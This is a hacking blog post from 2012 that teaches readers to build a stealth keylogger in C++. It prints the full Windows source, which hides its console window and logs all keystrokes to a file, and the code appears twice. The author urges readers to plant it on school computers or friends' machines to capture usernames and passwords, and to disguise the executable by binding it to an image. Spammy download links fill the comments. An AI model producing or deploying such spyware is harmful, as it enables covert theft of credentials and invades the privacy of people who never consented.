Search This Blog
Categories
- Games (1)
- Hack Facebook (7)
- Hacker News (3)
- Internet Hacks (2)
- Keylogger (4)
- Password Cracking (1)
- Programming (3)
- Security Tips (2)
- Tools (3)
Blog Archive
-
2012
(24)
-
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
October
(24)
Ads 468x60px
Social Icons
?
+
X
Recommended for you
Loading..
loading
Featured Posts
Saturday, October 20, 2012
Learn To create Keylogger using C++|Basic Hacking Tutorials
Hi friends, the most interesting part of the hacking is spying. Today i am going to introduce to the C++ Spyware code. It is going to be very fun. You can install this spyware in your college/school or in your friend system, and get their username and passwords. This is very simple hacking trick when compared to phishing web page.
Disadvantage of Phishing Web page:
you have to upload phishing web page to web hosting. But only few website won't detect the phishing webpage.
website url is different. Easy to detect that we are hacking.
Advantage of Spyware-keylogger:
Very simple and easy method.
Victim can't detect that we are hacking.
How to create Keylogger using Visual C++?
Requirements:
Dev C++. Download it from here: http://www.bloodshed.net/
Knowledge about Visual C++(need, if you are going to develop the code).
Install dev C++ in your system and open the dev C++ compiler.
Go to File->New->Source File.
you can see a blank works space will be there in window.
now copy the below keylogger code into the blank work space.
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}
Compile the Code(Ctrl+F9)
Now execute the program by selecting Execute->Run(ctrl+F10)
now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.
you can see the log.txt file where you save the file.
bind the exe file with image or any files and send it to your friend.
(0r)
if you have physical access to your college/school system,then copy the exe file in that system and run it.
For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.
Labels:Keylogger
Subscribe to:
Post Comments
(Atom)
Archives
-
▼
2012
(24)
-
▼
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
▼
October
(24)
Blogroll
Top Read
-
EA Games Generic Multi KeyGen v214 .exe File Format (KeyGen) EA Games Keygen is a powerful Keygen, that can generate product keys for...
-
The Anonymous Hackers collective claimed that they take down 12 child pornography websites. They found that illegal contents are being host...
-
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batc...
-
We discussed about Facebook hacking software – Facebook Freezer in my earlier article How to hack someones Facebook account . But, Faceboo...
-
The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. The g...
-
BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in B...
-
Internet access is one of the most important things you can provide to your users. It’s a morale booster, it helps them do their job (for s...
-
An easy to use SQL injection tool for retrieving database informations from a distant server. jSQL Injection features: GET, POST, he...
-
Sniperspy is best and Advanced Keylogger. It allows you to monitor your victim remotely like a television. No physical installation co...
-
Today i am going to introduce KeyCobra Hardware Keyloggers. KeyCobra provides three type of Hardware Keyloggers. They are Wi-Fi Hardwa...
D0Ubl3 Hack3R: Learn To Create Keylogger Using C++ >>>>> Download Now
ReplyDelete>>>>> Download Full
D0Ubl3 Hack3R: Learn To Create Keylogger Using C++ >>>>> Download LINK
>>>>> Download Now
D0Ubl3 Hack3R: Learn To Create Keylogger Using C++ >>>>> Download Full
>>>>> Download LINK